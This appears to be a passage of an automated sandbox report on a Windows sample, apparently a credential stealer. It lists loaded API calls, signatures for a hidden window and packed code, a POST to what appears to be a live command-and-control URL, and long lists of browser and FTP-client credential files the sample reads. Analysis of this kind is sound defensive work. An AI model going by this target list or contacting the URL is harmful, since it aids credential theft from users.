- DynamicLoader: kernel32.dll/GetSystemDefaultLocaleName
- DynamicLoader: fastprox.dll/DllGetClassObject
- DynamicLoader: fastprox.dll/DllCanUnloadNow
- DynamicLoader: kernel32.dll/RegOpenKeyExW
- DynamicLoader: PSAPI.DLL/EnumProcesses
- DynamicLoader: PSAPI.DLL/EnumProcessModules
- DynamicLoader: PSAPI.DLL/GetModuleBaseNameW
- DynamicLoader: ole32.dll/CoInitializeEx
- DynamicLoader: CRYPTBASE.dll/SystemFunction036
- DynamicLoader: ole32.dll/CoInitializeSecurity
- DynamicLoader: sechost.dll/LookupAccountNameLocalW
- DynamicLoader: ADVAPI32.dll/LookupAccountSidW
- DynamicLoader: sechost.dll/LookupAccountSidLocalW
- DynamicLoader: ole32.dll/CoCreateInstance
- DynamicLoader: kernel32.dll/SortGetHandle
- DynamicLoader: kernel32.dll/SortCloseHandle
- DynamicLoader: wmisvc.dll/ServiceMain
- DynamicLoader: wmisvc.dll/SvchostPushServiceGlobals
- DynamicLoader: kernel32.dll/RegOpenKeyExW
- DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
- DynamicLoader: CRYPTSP.dll/CryptGenRandom
- DynamicLoader: RpcRtRemote.dll/I_RpcExtInitializeExtensionPoint
- DynamicLoader: kernel32.dll/FlsGetValue
- DynamicLoader: ole32.dll/CoGetClassObject
- DynamicLoader: ole32.dll/CoGetMarshalSizeMax
- DynamicLoader: ole32.dll/CoMarshalInterface
- DynamicLoader: ole32.dll/CoUnmarshalInterface
- DynamicLoader: ole32.dll/StringFromIID
- DynamicLoader: ole32.dll/CoGetPSClsid
- DynamicLoader: ole32.dll/CoTaskMemAlloc
- DynamicLoader: ole32.dll/CoTaskMemFree
- DynamicLoader: ole32.dll/CoCreateInstance
- DynamicLoader: ole32.dll/CoReleaseMarshalData
- DynamicLoader: ole32.dll/DcomChannelSetHResult
- DynamicLoader: kernel32.dll/ResolveDelayLoadedAPI
- DynamicLoader: VSSAPI.DLL/CreateWriter
- DynamicLoader: OLEAUT32.dll/
- DynamicLoader: OLEAUT32.dll/
- DynamicLoader: ole32.dll/CoTaskMemFree
- DynamicLoader: ole32.dll/CoTaskMemAlloc
- DynamicLoader: ADVAPI32.dll/LookupAccountNameW
- DynamicLoader: sechost.dll/LookupAccountNameLocalW
- DynamicLoader: ADVAPI32.dll/LookupAccountSidW
- DynamicLoader: samcli.dll/NetLocalGroupGetMembers
- DynamicLoader: SAMLIB.dll/SamConnect
- DynamicLoader: RPCRT4.dll/NdrClientCall3
- DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
- DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
- DynamicLoader: RPCRT4.dll/RpcStringFreeW
- DynamicLoader: RPCRT4.dll/RpcBindingFree
- DynamicLoader: SAMLIB.dll/SamOpenDomain
- DynamicLoader: SAMLIB.dll/SamLookupNamesInDomain
- DynamicLoader: SAMLIB.dll/SamOpenAlias
- DynamicLoader: SAMLIB.dll/SamFreeMemory
- DynamicLoader: SAMLIB.dll/SamCloseHandle
- DynamicLoader: SAMLIB.dll/SamGetMembersInAlias
- DynamicLoader: netutils.dll/NetApiBufferFree
- DynamicLoader: SAMLIB.dll/SamEnumerateDomainsInSamServer
- DynamicLoader: SAMLIB.dll/SamLookupDomainInSamServer
- DynamicLoader: ole32.dll/CoCreateGuid
- DynamicLoader: ole32.dll/CoCreateInstance
- DynamicLoader: ole32.dll/StringFromCLSID
- DynamicLoader: OLEAUT32.dll/
- DynamicLoader: OLEAUT32.dll/
- DynamicLoader: PROPSYS.dll/VariantToPropVariant
- DynamicLoader: OLEAUT32.dll/
- DynamicLoader: wbemcore.dll/Reinitialize
- DynamicLoader: wbemsvc.dll/DllGetClassObject
- DynamicLoader: wbemsvc.dll/DllCanUnloadNow
- DynamicLoader: sechost.dll/LookupAccountSidLocalW
- DynamicLoader: authZ.dll/AuthzInitializeContextFromToken
- DynamicLoader: authZ.dll/AuthzInitializeObjectAccessAuditEvent2
- DynamicLoader: authZ.dll/AuthzAccessCheck
- DynamicLoader: authZ.dll/AuthzFreeAuditEvent
- DynamicLoader: authZ.dll/AuthzFreeContext
- DynamicLoader: authZ.dll/AuthzInitializeResourceManager
- DynamicLoader: authZ.dll/AuthzFreeResourceManager
- DynamicLoader: RPCRT4.dll/NdrClientCall3
- DynamicLoader: RPCRT4.dll/RpcBindingCreateW
- DynamicLoader: RPCRT4.dll/RpcBindingBind
- DynamicLoader: RPCRT4.dll/I_RpcMapWin32Status
- DynamicLoader: RPCRT4.dll/RpcBindingFree
- DynamicLoader: ADVAPI32.dll/EventRegister
- DynamicLoader: ADVAPI32.dll/EventUnregister
- DynamicLoader: ADVAPI32.dll/EventWrite
- DynamicLoader: ADVAPI32.dll/EventActivityIdControl
- DynamicLoader: ADVAPI32.dll/EventWriteTransfer
- DynamicLoader: ADVAPI32.dll/EventEnabled
- DynamicLoader: kernel32.dll/RegCloseKey
- DynamicLoader: kernel32.dll/RegSetValueExW
- DynamicLoader: kernel32.dll/RegOpenKeyExW
- DynamicLoader: kernel32.dll/RegQueryValueExW
- DynamicLoader: kernel32.dll/RegCloseKey
- DynamicLoader: wmisvc.dll/IsImproperShutdownDetected
- DynamicLoader: Wevtapi.dll/EvtRender
- DynamicLoader: Wevtapi.dll/EvtNext
- DynamicLoader: Wevtapi.dll/EvtClose
- DynamicLoader: Wevtapi.dll/EvtQuery
- DynamicLoader: Wevtapi.dll/EvtCreateRenderContext
- DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
- DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
- DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
- DynamicLoader: RPCRT4.dll/RpcBindingSetOption
- DynamicLoader: RPCRT4.dll/RpcStringFreeW
- DynamicLoader: RPCRT4.dll/NdrClientCall3
- DynamicLoader: RPCRT4.dll/RpcBindingFree
- DynamicLoader: kernel32.dll/ResolveDelayLoadedAPI
- DynamicLoader: ole32.dll/CoCreateFreeThreadedMarshaler
- DynamicLoader: ole32.dll/CoGetMarshalSizeMax
- DynamicLoader: ole32.dll/CreateStreamOnHGlobal
- DynamicLoader: ole32.dll/CoMarshalInterface
- DynamicLoader: CRYPTSP.dll/CryptGenRandom
- DynamicLoader: CRYPTSP.dll/CryptReleaseContext
- DynamicLoader: KERNELBASE.dll/InitializeAcl
- DynamicLoader: KERNELBASE.dll/AddAce
- DynamicLoader: kernel32.dll/OpenProcessToken
- DynamicLoader: KERNELBASE.dll/GetTokenInformation
- DynamicLoader: KERNELBASE.dll/DuplicateTokenEx
- DynamicLoader: KERNELBASE.dll/AdjustTokenPrivileges
- DynamicLoader: KERNELBASE.dll/AllocateAndInitializeSid
- DynamicLoader: KERNELBASE.dll/CheckTokenMembership
- DynamicLoader: kernel32.dll/SetThreadToken
- DynamicLoader: ADVAPI32.dll/RegOpenKeyW
- DynamicLoader: ole32.dll/CLSIDFromString
- DynamicLoader: ole32.dll/CoCreateInstance
- DynamicLoader: wbemcore.dll/Reinitialize
- DynamicLoader: authZ.dll/AuthzInitializeContextFromToken
- DynamicLoader: authZ.dll/AuthzInitializeResourceManager
- DynamicLoader: authZ.dll/AuthzInitializeContextFromSid
- DynamicLoader: authZ.dll/AuthzInitializeContextFromToken
- DynamicLoader: authZ.dll/AuthzAccessCheck
- DynamicLoader: authZ.dll/AuthzFreeContext
- DynamicLoader: authZ.dll/AuthzFreeResourceManager
- DynamicLoader: sechost.dll/LookupAccountSidLocalW
- DynamicLoader: wbemcore.dll/Reinitialize
- DynamicLoader: ole32.dll/CoGetClassObject
- DynamicLoader: ole32.dll/CoGetCallContext
- DynamicLoader: wbemcore.dll/Reinitialize
- DynamicLoader: wbemcore.dll/Reinitialize
- DynamicLoader: ole32.dll/StringFromGUID2
- DynamicLoader: ole32.dll/CoImpersonateClient
- DynamicLoader: ole32.dll/CoRevertToSelf
- DynamicLoader: ole32.dll/CoSwitchCallContext
- DynamicLoader: ole32.dll/CoCreateGuid
- DynamicLoader: kernel32.dll/ResolveDelayLoadedAPI
- DynamicLoader: ole32.dll/CoInitializeEx
- DynamicLoader: OLEAUT32.dll/
- DynamicLoader: wbemcore.dll/Reinitialize
- DynamicLoader: wbemcore.dll/Reinitialize
- DynamicLoader: wbemcore.dll/Reinitialize
- DynamicLoader: wbemcore.dll/Reinitialize
- DynamicLoader: wbemcore.dll/Reinitialize
- DynamicLoader: ole32.dll/CoInitializeEx
- DynamicLoader: ole32.dll/CoUninitialize
- DynamicLoader: kernel32.dll/SortGetHandle
- DynamicLoader: kernel32.dll/SortCloseHandle
- DynamicLoader: CRYPTBASE.dll/SystemFunction036
- DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
- DynamicLoader: sechost.dll/LookupAccountNameLocalW
- DynamicLoader: ADVAPI32.dll/LookupAccountSidW
- DynamicLoader: sechost.dll/LookupAccountSidLocalW
- DynamicLoader: kernel32.dll/GetThreadPreferredUILanguages
- DynamicLoader: kernel32.dll/SetThreadPreferredUILanguages
- DynamicLoader: kernel32.dll/LocaleNameToLCID
- DynamicLoader: kernel32.dll/GetLocaleInfoEx
- DynamicLoader: kernel32.dll/LCIDToLocaleName
- DynamicLoader: kernel32.dll/GetSystemDefaultLocaleName
- DynamicLoader: FastProx.dll/DllGetClassObject
- DynamicLoader: FastProx.dll/DllCanUnloadNow
- DynamicLoader: kernel32.dll/RegOpenKeyExW
- DynamicLoader: sechost.dll/LookupAccountSidLocalW
- DynamicLoader: ole32.dll/CLSIDFromString
- DynamicLoader: OLEAUT32.dll/
- DynamicLoader: OLEAUT32.dll/
- DynamicLoader: OLEAUT32.dll/
- DynamicLoader: OLEAUT32.dll/
A process created a hidden window
Severity: Medium
Confidence: Very High
- Process: svchost.exe -> \\?\C:\Windows\system32\wbem\WMIADAP.EXE
HTTP traffic contains suspicious features which may be indicative of malware related traffic
Severity: Medium
Confidence: Low
- post_no_referer: HTTP traffic contains a POST request with no referer header
- http_version_old: HTTP traffic uses version 1.0
- suspicious_request: http://blackdiamondsco.ae/trip/fre.php
Performs some HTTP requests
Severity: Medium
Confidence: Low
- url: http://blackdiamondsco.ae/trip/fre.php
The binary likely contains encrypted or compressed data.
Severity: Medium
Confidence: Very High
- section: name: .text, entropy: 6.93, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ, raw_size: 0x0003e400, virtual_size: 0x0003e234
SetUnhandledExceptionFilter detected (possible anti-debug)
Severity: Low
Confidence: Very High
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven04_64 | Seven04_64 | VirtualBox | 2018-09-09 19:20:30 | 2018-09-09 19:24:18 | 228 |
12 Summary items with data
Files
C:\Windows\System32\MSCOREE.DLL.local C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll C:\Windows\Microsoft.NET\Framework\* C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll C:\Users\Seven01\AppData\Local\Temp\TRIP2323232.exe.config C:\Users\Seven01\AppData\Local\Temp\TRIP2323232.exe C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Users\Seven01\AppData\Local\Temp\TRIP2323232.exe.Local\ C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll C:\Windows C:\Windows\winsxs C:\Windows\Microsoft.NET\Framework\v4.0.30319 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\fusion.localgac C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI C:\Users C:\Users\Seven01 C:\Users\Seven01\AppData C:\Users\Seven01\AppData\Local C:\Users\Seven01\AppData\Local\Temp C:\Windows\System32\l_intl.nls C:\Windows\Microsoft.NET\Framework\v2.0.50727\ole32.dll \Device\KsecDD C:\Users\Seven01\AppData\Local\Temp\TRIP2323232.INI C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll C:\Windows\assembly\pubpol36.dat C:\Windows\assembly\GAC\PublisherPolicy.tme C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.INI C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI C:\Windows\assembly\GAC_MSIL\System.Drawing\2.0.0.0__b03f5f7f11d50a3a\System.Drawing.INI C:\Windows\Globalization\it-it.nlp C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp C:\Users\Seven01\AppData\Local\Temp\it-IT\TRIP2323232.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\TRIP2323232.resources\TRIP2323232.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\TRIP2323232.resources.exe C:\Users\Seven01\AppData\Local\Temp\it-IT\TRIP2323232.resources\TRIP2323232.resources.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll.DLL C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll C:\Windows\Globalization\it.nlp C:\Users\Seven01\AppData\Local\Temp\it\TRIP2323232.resources.dll C:\Users\Seven01\AppData\Local\Temp\it\TRIP2323232.resources\TRIP2323232.resources.dll C:\Users\Seven01\AppData\Local\Temp\it\TRIP2323232.resources.exe C:\Users\Seven01\AppData\Local\Temp\it\TRIP2323232.resources\TRIP2323232.resources.exe C:\Windows\Globalization\en-us.nlp C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089 C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089 C:\Windows\assembly\GAC\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089 C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.exe C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.exe C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it_b77a5c561934e089 C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089 C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.INI C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\psapi.dll C:\Users\Seven01\AppData\Local\Temp\RunPEDll.dll C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.dll C:\Users\Seven01\AppData\Local\Temp\RunPEDll.exe C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.exe C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.exe C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.exe C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.dll C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.dll C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.exe C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2288.31347515 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2288.31347515 C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2288.31347765 C:\Program Files\NETGATE\Black Hawk C:\Program Files (x86)\Lunascape\Lunascape6\plugins\{9BDD5314-20A6-4d98-AB30-8325A95771EE} C:\Users\Seven01\AppData\Local\Comodo\Dragon\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Comodo\Dragon\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalComodo\Dragon\Login Data C:\Users\Seven01\AppData\LocalComodo\Dragon\Default\Login Data C:\Users\Seven01\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalMapleStudio\ChromePlus\Login Data C:\Users\Seven01\AppData\LocalMapleStudio\ChromePlus\Default\Login Data C:\Users\Seven01\AppData\Local\Google\Chrome\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Google\Chrome\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalGoogle\Chrome\Login Data C:\Users\Seven01\AppData\LocalGoogle\Chrome\Default\Login Data C:\Users\Seven01\AppData\Local\Nichrome\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Nichrome\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalNichrome\Login Data C:\Users\Seven01\AppData\LocalNichrome\Default\Login Data C:\Users\Seven01\AppData\Local\RockMelt\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\RockMelt\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalRockMelt\Login Data C:\Users\Seven01\AppData\LocalRockMelt\Default\Login Data C:\Users\Seven01\AppData\Local\Spark\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Spark\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalSpark\Login Data C:\Users\Seven01\AppData\LocalSpark\Default\Login Data C:\Users\Seven01\AppData\Local\Chromium\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Chromium\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalChromium\Login Data C:\Users\Seven01\AppData\LocalChromium\Default\Login Data C:\Users\Seven01\AppData\Local\Titan Browser\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Titan Browser\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalTitan Browser\Login Data C:\Users\Seven01\AppData\LocalTitan Browser\Default\Login Data C:\Users\Seven01\AppData\Local\Torch\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Torch\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalTorch\Login Data C:\Users\Seven01\AppData\LocalTorch\Default\Login Data C:\Users\Seven01\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalYandex\YandexBrowser\Login Data C:\Users\Seven01\AppData\LocalYandex\YandexBrowser\Default\Login Data C:\Users\Seven01\AppData\Local\Epic Privacy Browser\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Epic Privacy Browser\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalEpic Privacy Browser\Login Data C:\Users\Seven01\AppData\LocalEpic Privacy Browser\Default\Login Data C:\Users\Seven01\AppData\Local\CocCoc\Browser\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\CocCoc\Browser\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalCocCoc\Browser\Login Data C:\Users\Seven01\AppData\LocalCocCoc\Browser\Default\Login Data C:\Users\Seven01\AppData\Local\Vivaldi\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Vivaldi\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalVivaldi\Login Data C:\Users\Seven01\AppData\LocalVivaldi\Default\Login Data C:\Users\Seven01\AppData\Local\Comodo\Chromodo\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Comodo\Chromodo\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalComodo\Chromodo\Login Data C:\Users\Seven01\AppData\LocalComodo\Chromodo\Default\Login Data C:\Users\Seven01\AppData\Local\Superbird\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Superbird\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalSuperbird\Login Data C:\Users\Seven01\AppData\LocalSuperbird\Default\Login Data C:\Users\Seven01\AppData\Local\Coowon\Coowon\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Coowon\Coowon\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalCoowon\Coowon\Login Data C:\Users\Seven01\AppData\LocalCoowon\Coowon\Default\Login Data C:\Users\Seven01\AppData\Local\Mustang Browser\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Mustang Browser\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalMustang Browser\Login Data C:\Users\Seven01\AppData\LocalMustang Browser\Default\Login Data C:\Users\Seven01\AppData\Local\360Browser\Browser\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\360Browser\Browser\User Data\Default\Web Data C:\Users\Seven01\AppData\Local360Browser\Browser\Login Data C:\Users\Seven01\AppData\Local360Browser\Browser\Default\Login Data C:\Users\Seven01\AppData\Local\CatalinaGroup\Citrio\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\CatalinaGroup\Citrio\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalCatalinaGroup\Citrio\Login Data C:\Users\Seven01\AppData\LocalCatalinaGroup\Citrio\Default\Login Data C:\Users\Seven01\AppData\Local\Google\Chrome SxS\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Google\Chrome SxS\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalGoogle\Chrome SxS\Login Data C:\Users\Seven01\AppData\LocalGoogle\Chrome SxS\Default\Login Data C:\Users\Seven01\AppData\Local\Orbitum\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Orbitum\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalOrbitum\Login Data C:\Users\Seven01\AppData\LocalOrbitum\Default\Login Data C:\Users\Seven01\AppData\Local\Iridium\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Iridium\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalIridium\Login Data C:\Users\Seven01\AppData\LocalIridium\Default\Login Data C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Login Data C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Web Data C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\Login Data C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\Default\Login Data C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\User Data\Default\Login Data C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\User Data\Default\Web Data C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\Login Data C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\Default\Login Data C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\User Data\Default\Login Data C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\User Data\Default\Web Data C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\Login Data C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\Default\Login Data C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\User Data\Default\Login Data C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\User Data\Default\Web Data C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\Login Data C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\Default\Login Data C:\Users\Seven01\AppData\Local\QupZilla\profiles\default\browsedata.db C:\Users\Seven01\AppData\Roaming\Opera C:\Users\Seven01\AppData\Roaming\.purple\accounts.xml C:\Users\Seven01\Documents\SuperPutty C:\Program Files (x86)\FTPShell\ftpshell.fsi C:\Users\Seven01\AppData\Roaming\Notepad++\plugins\config\NppFTP\NppFTP.xml C:\Program Files (x86)\oZone3D\MyFTP\myftp.ini C:\Users\Seven01\AppData\Roaming\FTPBox\profiles.conf C:\Program Files (x86)\Sherrod Computers\sherrod FTP\favorites C:\Program Files (x86)\FTP Now\sites.xml C:\Program Files (x86)\NexusFile\userdata\ftpsite.ini C:\Users\Seven01\AppData\Roaming\NexusFile\ftpsite.ini C:\Users\Seven01\Documents\NetSarang\Xftp\Sessions C:\Users\Seven01\AppData\Roaming\NetSarang\Xftp\Sessions C:\Program Files (x86)\EasyFTP\data C:\Users\Seven01\AppData\Roaming\SftpNetDrive C:\Program Files (x86)\AbleFTP7\encPwd.jsd C:\Program Files (x86)\AbleFTP7\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\AbleFTP7\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\AbleFTP8\encPwd.jsd C:\Program Files (x86)\AbleFTP8\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\AbleFTP8\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\AbleFTP9\encPwd.jsd C:\Program Files (x86)\AbleFTP9\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\AbleFTP9\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\AbleFTP10\encPwd.jsd C:\Program Files (x86)\AbleFTP10\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\AbleFTP10\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\AbleFTP11\encPwd.jsd C:\Program Files (x86)\AbleFTP11\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\AbleFTP11\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\AbleFTP12\encPwd.jsd C:\Program Files (x86)\AbleFTP12\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\AbleFTP12\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\AbleFTP13\encPwd.jsd C:\Program Files (x86)\AbleFTP13\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\AbleFTP13\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\AbleFTP14\encPwd.jsd C:\Program Files (x86)\AbleFTP14\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\AbleFTP14\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\JaSFtp7\encPwd.jsd C:\Program Files (x86)\JaSFtp7\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\JaSFtp7\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\JaSFtp8\encPwd.jsd C:\Program Files (x86)\JaSFtp8\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\JaSFtp8\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\JaSFtp9\encPwd.jsd C:\Program Files (x86)\JaSFtp9\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\JaSFtp9\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\JaSFtp10\encPwd.jsd C:\Program Files (x86)\JaSFtp10\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\JaSFtp10\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\JaSFtp11\encPwd.jsd C:\Program Files (x86)\JaSFtp11\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\JaSFtp11\data\settings\ftpProfiles-j.jsd C:\Program 